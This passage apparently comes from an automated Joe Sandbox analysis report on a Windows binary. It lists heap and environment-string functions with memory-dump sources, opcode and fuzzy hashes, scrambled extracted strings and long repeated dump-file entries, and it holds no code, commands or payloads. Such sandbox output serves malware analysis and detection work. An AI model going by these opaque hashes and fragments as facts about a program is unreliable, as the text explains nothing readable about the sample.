                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                              • Opcode ID: 74802a0707bddc923b6f4be7cec4cdf3a2c3fe67f125e246a0b18ac3960d082e
                                                                                                                                                                                                                              • Instruction ID: 325940b50c00becebc0ee915ce016753e7da6cd8f7d380a2380fe50fe6e60df0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74802a0707bddc923b6f4be7cec4cdf3a2c3fe67f125e246a0b18ac3960d082e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BD0C932519122EBC6316F68B815BC73A949F59660F070891E4846A0A8C669EC91DAD0
                                                                                                                                                                                                                              Function 0100C55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 0100C561
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 9deb2e4b258033e8e8faff4ac5c1dac1d50674ae870d254300fe1fc015dd6409
                                                                                                                                                                                                                              • Instruction ID: 6fb1f7a5d8fa189406a0a0aaa33636b0ae83502471f3a26552aae713331ee920
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9deb2e4b258033e8e8faff4ac5c1dac1d50674ae870d254300fe1fc015dd6409
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7A00172184110DADA762E64BC09B847A22AB58621F224291E541590BA866698929A84

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00FE1D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL ref: 00FE1EC3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: 8$?$L$[$^$a$p$y$|
                                                                                                                                                                                                                              • API String ID: 237503144-3949209405
                                                                                                                                                                                                                              • Opcode ID: e5e0f52c8ba0c9aea263fd2a84f38b283fe92dd3a46f8630f1a47427ab8b77bb
                                                                                                                                                                                                                              • Instruction ID: a5e3fe441c2cd8e91f1c640af8e8270c48be0158ee4694c703b5f9c67cb3180e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5e0f52c8ba0c9aea263fd2a84f38b283fe92dd3a46f8630f1a47427ab8b77bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0012837150C7C08BD364DF39C4913AEBBE5AF85324F184A2EE5D987382E6389945EB43
                                                                                                                                                                                                                              Function 00FF7740 Relevance: 16.6, Strings: 13, Instructions: 338COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: !A/C$$Y)[$1Q>S$DE$O=q?$P-X/$S%g'$Z)o+$f!V#$r$s1z3$}5x7$}9F;
                                                                                                                                                                                                                              • API String ID: 0-3413813421
                                                                                                                                                                                                                              • Opcode ID: d945b577f19d1ab187d907519208da666933d95547d0e9723fa974c82f21bc68
                                                                                                                                                                                                                              • Instruction ID: fb56b78a470a9b699322ee4ec5a8269d7f6998483c711be15dec6f23b4a1e3cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d945b577f19d1ab187d907519208da666933d95547d0e9723fa974c82f21bc68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8C1EDB16083418FD724DF24D851B6BBBF2EF81354F04496CE1D98B3A2D7398909CB96
                                                                                                                                                                                                                              Function 00FEC8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
